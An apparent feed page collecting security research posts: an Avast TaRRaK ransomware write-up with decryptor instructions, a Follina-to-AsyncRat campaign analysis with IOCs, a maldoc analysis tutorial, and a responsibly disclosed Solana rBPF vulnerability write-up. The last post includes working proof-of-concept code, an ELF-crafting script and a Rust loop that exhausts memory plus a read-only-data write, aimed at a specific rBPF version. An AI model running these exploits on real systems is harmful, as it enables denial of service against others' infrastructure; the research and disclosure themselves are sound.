Normal view

There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Decrypted: TaRRaK Ransomware

6 June 2022 at 12:10

The TaRRaK ransomware appeared in June of 2021. This ransomware contains many coding errors, so we decided to publish a small blog about them. Samples of this ransomware were spotted in our user base, so we also created a decryptor for this ransomware.

Skip to instructions on how to use the TaRRaK decryptor.

Behavior of the ransomware

The ransomware is written in .NET. The binary is very clean and contains no protections or obfuscations. When executed, the sample creates a mutex named TaRRaK in order to ensure that only one instance of the malware is executed. Also, an auto-start registry entry is created in order to execute the ransomware on every user login:

The ransomware contains a list of 178 file types (extensions) that, when found, are encrypted:

3ds 7z 7zip acc accdb ai aif apk asc asm asf asp aspx avi backup bak bat bin bmp c cdr cer cfg cmd cpp crt crw cs csproj css csv cue db db3 dbf dcr dds der dmg dng doc docm docx dotx dwg dxf dxg eps epub erf flac flv gif gpg h html ico img iso java jpe jpeg jpg js json kdc key kml kmz litesql log lua m3u m4a m4u m4v max mdb mdf mef mid mkv mov mp3 mp4 mpa mpeg mpg mrw nef nrw obj odb odc odm odp ods odt orf p12 p7b p7c part pdb pdd pdf pef pem pfx php plist png ppt pptm pptx ps ps1 psd pst ptx pub pri py pyc r3d raf rar raw rb rm rtf rwl sav sh sln suo sql sqlite sqlite3 sqlitedb sr2 srf srt srw svg swf tga thm tif tiff tmp torrent txt vbs vcf vlf vmx vmdk vdi vob wav wma wmi wmv wpd wps x3f xlk xlm xls xlsb xlsm xlsx xml zip

The ransomware avoids folders containing one the following strings:

  • All Users\Microsoft\
  • $Recycle.Bin
  • :\Windows
  • \Program Files
  • Temporary Internet Files
  • \Local\Microsoft\
  • :\ProgramData\

Encrypted files are given a new extension .TaRRaK. They also contain the TaRRaK signature at the beginning of the encrypted file:

File Encryption

Implementation of the encryption is a nice example of a buggy code:

First, the ransomware attempts to read the entire file to memory using File.ReadAllBytes(). This function has an internal limit – a maximum of 2 GB of data can be loaded. In case the file is larger, the function throws an exception, which is then handled by the try-catch block. Unfortunately, the try-catch block only handles a permission-denied condition. So it adds an ACL entry granting full access to everyone and retries the read data operation. In case of any other error (read failure, sharing violation, out of memory, read from an offline file), the exception is raised again and the ransomware is stuck in an infinite loop.

Even if the data load operation succeeds and the file data can be fit in memory, there’s another catch. The Encrypt function converts the array of bytes to an array of 32-bit integers:

So it allocates another block of memory with the same size as the file size. It then performs an encryption operation, using a custom encryption algorithm. Encrypted Uint32 array is converted to another array of bytes and written to the file. So in addition to the memory allocation for the original file data, two extra blocks are allocated. If any of the memory allocations fails, it throws an exception and the ransomware is again stuck in an infinite loop.

In the rare case when the encryption process finishes (no sharing violation or another error), the ransom note file named Encrypted Files by TaRRaK.txt is dropped to the root folder of each drive:

Files with the .TaRRaK extension are associated with their own icon:

Finally, desktop wallpaper is set to the following bitmap:

How to use the Avast decryptor to decrypt files encrypted by TaRRaK Ransomware

To decrypt your files, follow these steps:

  1. You must be logged to the same user account like the one under which the files were encrypted.
  2. Download the free Avast decryptor for 32-bit or 64-bit Windows.
  3. Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  4. On the initial page, you can read the license information, if you want, but you really only need to click “Next”
  1. On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
  1. On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

IOCs

SHA256
00965b787655b23fa32ef2154d64ee9e4e505a42d70f5bb92d08d41467fb813d
47554d3ac4f61e223123845663c886b42016b4107e285b7da6a823c2f5050b86
aafa0f4d3106755e7e261d337d792d3c34fc820872fd6d1aade77b904762d212
af760d272c64a9258fab7f0f80aa2bba2a685772c79b1dec2ebf6f3b6738c823

The post Decrypted: TaRRaK Ransomware appeared first on Avast Threat Labs.

Outbreak of Follina in Australia

Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.

Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.

Key Observations

This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.

Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.

First stage

The compromised website, as pictured in the screenshot below, was used to host robots.txt which is an executable which was disguised as “robots.txt”. We believe the name was used to conceal itself from detection if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this file “robots.txt” was downloaded and saved as the file (Sihost.exe) and then executed.

Second Stage, Sihost.exe

When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.

Third stage, favicon.svg

After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.

Fourth Stage, Sevntx64.exe and Sevntx64.lnk

When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.

The screenshot below shows the executable loading the shellcode.

Final Stage, AsyncRat

When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443

AsyncRat SHA256:

aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Screenshot below with AsyncRat configuration:

Conclusion

We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.

IOCs:

item sha256
main webpage 0af202af06aef4d36ea151c5a304414a67aee18c3675286275bd01d11a760c04 
robots.txt b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447 
favicon.svg ed4091700374e007ae478c048734c4bc0b7fe0f41e6d5c611351bf301659eee0
decrypted favicon.svg 9651e604f972e36333b14a4095d1758b50decda893e8ff8ab52c95ea89bb9f74
Sevntx64.exe f3ccf22db2c1060251096fe99464002318baccf598b626f8dbdd5e7fd71fd23f 
Sevntx64.lnk 33297dc67c12c7876b8052a5f490cc6a4c50a22712ccf36f4f92962463eb744d 
shellcode from Sevntx64.exe (66814 bytes) 7d6d317616d237ba8301707230abbbae64b2f8adb48b878c528a5e42f419133a
asyncrat aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479

Bonus

We managed to find an earlier version of this malware.

file hash first seen country
Grievance Against Lawyers, Judge or Justice.doc.exe (signed) 87BD2DDFF6A90601F67499384290533701F5A5E6CB43DE185A8EA858A0604974  26.05.2022 NL, proxy
Grievance Against Lawyers, Judge or Justice (1).zip\Grievance Against Lawyers, Judge or Justice.doc.exe 0477CAC3443BB6E46DE9B904CBA478B778A5C9F82EA411D44A29961F5CC5C842 18.05.2022 Palau, previous victim

Forensic information from the lnk file:

field value
Application Sevntx64.exe
Accessed time 2022-05-19 09:34:26
Birth droid MAC address 00:0C:29:59:3C:CC
Birth droid file ID 0e711e902ecfec11954f000c29593ccc
Birth droid volume ID b097e82425d6c944b33e40f61c831eaf
Creation time 2022-05-19 10:29:34
Drive serial number 0xd4e21f4f
Drive type DRIVE_FIXED
Droid file ID 0e711e902ecfec11954f000c29593ccc
Droid volume ID b097e82425d6c944b33e40f61c831eaf
File flags FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_READONLY
Known folder ID af2448ede4dca84581e2fc7965083634
Link flags EnableTargetMetadata, HasLinkInfo, HasRelativePath, HasTargetIDList, HasWorkingDir, IsUnicodeLocal
base path C:\Users\Public\Documents\Sevntx64.exe
Location Local
MAC address 00:0C:29:59:3C:CC
Machine identifier desktop-eev1hc3
Modified time 2020-08-19 04:13:44
Relative path .\Sevntx64.exe
Size 1543
Target file size 376368
Working directory C:\Users\Public\Documents

The post Outbreak of Follina in Australia appeared first on Avast Threat Labs.

Malicious Document Analysis: Example 2

14 January 2022 at 16:45

I returned to write the second article of Malware Analysis Series (MAS) last January/08 after receiving an outstanding support from a high-profile professional and company of the industry, but while the article is not ready (I working on page 43 and far from the end), I spent a couple of hours writing a simple and short article on malicious document analysis. I hope it helps someone.

The PDF version is available on: https://exploitreversing.files.wordpress.com/2022/01/mda_2-2.pdf

Keep reversing and have an excellent day.

Alexandre Borges.

Malware Analysis Series (MAS) – Article 1

3 December 2021 at 08:17

The first article of MAS (Malware Analysis Series) is available for reading from:

(link): https://exploitreversing.files.wordpress.com/2021/12/mas_1_rev_1.pdf

Soon I have enough time, so I’ll publish an HTML version of it.

Have an excellent day.

Alexandre Borges.

PS: this is a live document, so new versions of it will be published soon errors and mistakes are found.

Malicious Document Analysis: Example 1

2 November 2021 at 20:21

The PDF version of this article can be found here: https://exploitreversing.files.wordpress.com/2021/11/mda_1-2.pdf

Introduction

While the first article of MAS (Malware Analysis Series)
is not ready, I’m leaving here a very simple case of malicious document analysis for helping my Twitter followers and any professional interested in learning how to analyze this kind of artifact.

Before starting the analysis, I’m going to use the following environment and tools:

Furthermore, it’s always recommended to install Oletools (from Decalage — @decalage2):

# python -m pip install -U oletools

All three tools above are usually installed on REMnux by default. However, if you are using Ubuntu or any other Linux distribution, so you can install them through links and command above.

Like any common binary, we can analyze any maldoc using static or dynamic analysis, but as my preferred approach is always the former one, so let’s take it.

We’ll be analyzing the following sample: 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Downloading sample and gathering information

The first step is getting general information about this hash by using any well-known endpoint such as
Virus Total, Hybrid Analysis, Triage, Malware Bazaar
and so on. Therefore, let’s use Malwoverview to do it on the command line and collect information from Malware Bazaar that, fortunately, also brings information from excellent Triage:

remnux@remnux:~/articles$ malwoverview.py -b 1 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc


Analyzing the malicious document

Given the output above, we could try to make an assumption that the dropped executable comes from the own maldoc because Microsoft Office loads VBA resource, possible macro or embedded object present. Furthermore, the maldoc seems to elevate privilege (AdjustPrivilege( )), hook (intercept events) by installing a hook procedure into a hook chain (SetWindowsHookEx( )), maybe it makes code injection (WriteProcessMemory( )), so we it’s reasonable to assume these Triage signatures are associate to the an embedded executable. Therefore it’s time to download the malicious document from Triage (you can do it from https://tria.ge/dashboard website, if you wish):

remnux@remnux:~/articles$ malwoverview.py -b 5 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Uncompress it by executing the following command (password is “infected“) and collect information using olevba tool:

remnux@remnux:~/articles$ 7z e 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.zip

Using olevba and oleid (from
oletools
) to collect further information we have the following outputs:

remnux@remnux:~/articles$ olevba -a 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx


remnux@remnux:~/articles$ oleid 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx


From both previous outputs, important facts come up:

  • Some code is executed when the MS Word is executed.
  • A file seems to be written to the file system.
  • The maldoc seems to open a file (probably the same written above).
  • VBA macros are responsible for the entire activity.

The next step is to analyze the maldoc, which is a OLE document, we are going use oledump.py (from Didier Steven’s suite — @DidierStevens) to check the OLE’s internals and try to understand what’s happening:


According to the figure above we have:

  • three macros in 16, 17 and 18.
  • a big “content” in 11, which could be one of “VBA resources” mentioned Triage’s output.
  • Once again, we can decide to use dynamic analysis (a debugger) or static analysis to expose the real threat hidden inside this malicious document, but let’s proceed with static analysis because it will bring more details while addressing the problem.

In the next step we need to check the macros’ content by uncompressing their contents (-v option) using oledump.py:

remnux@remnux:~/articles$ oledump.py -s 16 -v 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx | more


There’re few details that can be observed from output above:

  • Obviously the code is obfuscated.
  • The Split function, which returns a zero-based and one-dimensional array containing substrings, manipulates the content from UserForm1 (object 11) and, apparently, this content is divided in four parts (TextBox1, TextBox2, TextBox3 and TextBox4). In addition, the UserForm1 content seems to be separated by “!” character.
  • The UserForm2 is also being (TextBox1 and TextBox2) in a MoveFile operation.
  • The Winmgmt service, which is a WMI service operating inside the svchost process under LocalSystem account, is being used to execute an operation given by UserForm2.TextBox5.
  • The UserForm2.Text6 is used to create a reference to an object provided by ActiveX.
  • The UserForm2.Text7 is being used to save some content as a binary file.

Therefore we must investigate the content of object 15 (Macros/UserForm2/o):

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 15 -d | strings

=

We can infer from figure above that:

  • UserForm2.Text1: C:\Users\Public\Pictures\winword.con
  • UserForm2.Text2: C:\Users\Public\Pictures\winword.exe
  • We are moving winword.com
    to winword.exe
    within C:\Users\Public\Pictures\ directory.
  • UserForm2.Text3: Scripting.FileSystemObject
  • UserForm2.Text4: winmgmts:{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2}
  • UserForm2.Text5: Win32_ProcessStartup
  • UserForm2.Text6: winmgmts:root\cimv2:Win32_Process
  • UserForm2.Text7: ADODB.Stream

The remaining macros don’t hold nothing really critical for our analysis this time:

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 17 -v | strings | tail +9

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 18 -v | strings | tail +9


Analyzing the image above (check SaveBinaryData()
function) and previous figures, it’s reasonable to assume that an executable, which we don’t know yet, will be saved as winword.com and later it will be renamed to winword.exe within C:\Users\Public\Pictures\ directory. Finally, the binary will be executed by calling objProcess.create() function.

At this point, we should verify the content of object 11 (check “Macros/UserForm1/o“) because it likely contain our “hidden” executable. Thus, run the following command:

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d | more


As we expected and mentioned previously, these decimal numbers are separated by “!” character.

Additionally, there’s a catch: according to last figure, this object has 4 parts (UserForm1.Text1, UserForm1.Text2, UserForm1.Text3 and UserForm1.Text4), so we should dump it into a file (dump1), edit and “join” all parts.

To dump the “object 11” into a file (named dump1) execute the following command: :

remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d > dump1

We need to “clean up” dump1 file:

  • Editing the file using “vi” command or any other editor.
  • Using “$” to go to the end of each line.
  • Removing occurrences of “Tahoma” word and any garbage (easily identified) from the text.
  • Join this line with the next one (“J” command on “vi“)

After editing the dump1 file, we have two replace all “!” characters by commas, and transform all decimal numbers into hex bytes. First, replace all “!” characters by comma using a simple “sed” command:

remnux@remnux:~/articles$ sed -e ‘s/!/,/g’ dump1 > dump3

remnux@remnux:~/articles$ cat dump3 | more


From this point we have to process and transform this file (dump3) to something useful end we have two clear options:

I’m going to show you both methods, though I always prefer programming a small script. Please, pay attention to the fact that all decimal numbers are separated by comma, so it will demand an extra concern during the decoding operation.

To decode this file on CyberChef you have to:

  • Load it onto CyberChef’s input pane. There’s an button on top-right to do it.
  • Pick up “From Decimal” operation and configure the delimiter to “Comma”.

Afterwards, you’ll see an executable in the Output pane, which can be saved onto file system.


Saving the file from Output pane, save the file and check its type:

remnux@remnux:~/Downloads$ file download.dat

download.dat: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

It’s excellent! Let’s now write a simple Python code named python_convert.py to perform the same operation and get the same result:


remnux@remnux:~/articles$ python3.8 ./python_convert_1.py

remnux@remnux:~/articles$ file final_file.bin

final_file.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

As we expected, it’s worked! Finally, let’s check the final binary on Virus Total and Triage to learn a bit further about the extracted binary (next figures):


It would be super easy to extract the same malware from the maldoc by using dynamic analysis. You’ll find out that a password is protecting the VBA Project, but this quite trivial to remove this kind of protection:


That’s it! I hope you have learned something new from this article and see you at next next one.         

 

                                                                                    A.B.

The start

7 September 2021 at 19:23

“Long is the way and hard, that out of hell leads up to light.”

(by John Milton from Paradise Lost — 1667)

My name is Alexandre Borges and I’m a security researcher focused on reverse engineering, exploit development and programming. Therefore, I’ll try to keep this blog updated and including write-up’s about these topics.

Honestly, I hope you can learn something from my posts.

Please, you should feel free to contact me and comment about any mistake and inaccuracy.

Have an excellent day.

A.B.

exploitreversing

Earn $200K by fuzzing for a weekend: Part 2

By: addison
11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found in approximately two hours of fuzzer start.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forceably terminated. As a result, the leaking program was running out this meter at exactly the call instruction.

A faulty optimisation

There is a wall of text at line 420 of jit.rs which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call in order to reduce the amount of times they update and check the meter. This optimisation is totally reasonable; we don’t care if we run out of instructions at the middle of a block because the subsequent instructions are still “safe”, and if we ever hit an exit that’s the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
    • our meter updates here
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

  1. invoke the call, which fails because the symbol is unresolved
  2. to report the unresolved symbol, we invoke that report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
  3. the pc is updated
  4. the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and never dropped. Thus: any pointer to that heap allocation is lost and will never be freed, leading to the leak.

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.

Weaponisation

Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source
pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_mul(ebpf::INSN_SIZE)
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                            .dynsyms
                            .get(relocation.r_sym)
                            .ok_or(ElfError::UnknownSymbol(relocation.r_sym))?;
                        name = elf
                            .dynstrtab
                            .get_at(sym.st_name)
                            .ok_or(ElfError::UnknownSymbol(sym.st_name))?;
                    }
                }
                _ => (),
            }
        }
    }
    Err(ElfError::UnresolvedSymbol(
        name.to_string(),
        file_offset
            .checked_div(ebpf::INSN_SIZE)
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))
            .unwrap_or(ebpf::ELF_INSN_DUMP_OFFSET),
        file_offset,
    )
    .into())
}

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

To create an unresolved relocation in BPF, it’s actually quite simple. We just need to create a function with a very, very long name that isn’t actually defined, only declared. To do so, I created two files to craft the malicious ELF:

evil.h

evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h
evil.c
#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");
  EVIL();
}

Note that goto +0 is used here because we’ll use a specialised instruction meter that only can do two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

elf-memleak.rs

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/evil.so").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();
        }
    }
}

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.

Reporting

Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

entrypoint:
    goto +0
    r0 = 0
    call -1

where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.

The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear as to what exactly what caused the bug. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0
    exit

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to a immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.

So why isn’t it?

The curse of x86

Let’s make our payload more clear and execute directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for OOB write:

oob-write.rs

This code likely no longer works due to changes in the API of rBPF changing in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        Arch,
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
        Source,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code
        .load(MemSize::DoubleWord).set_dst(9).push()
        .load(MemSize::Word).set_imm(1).push()
        .store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push()
        .exit().push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}

This just sets up and executes the following BPF assembly:

entrypoint:
    lddw r9, 0x100000000
    stxh [r9+0x0], r0
    exit

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

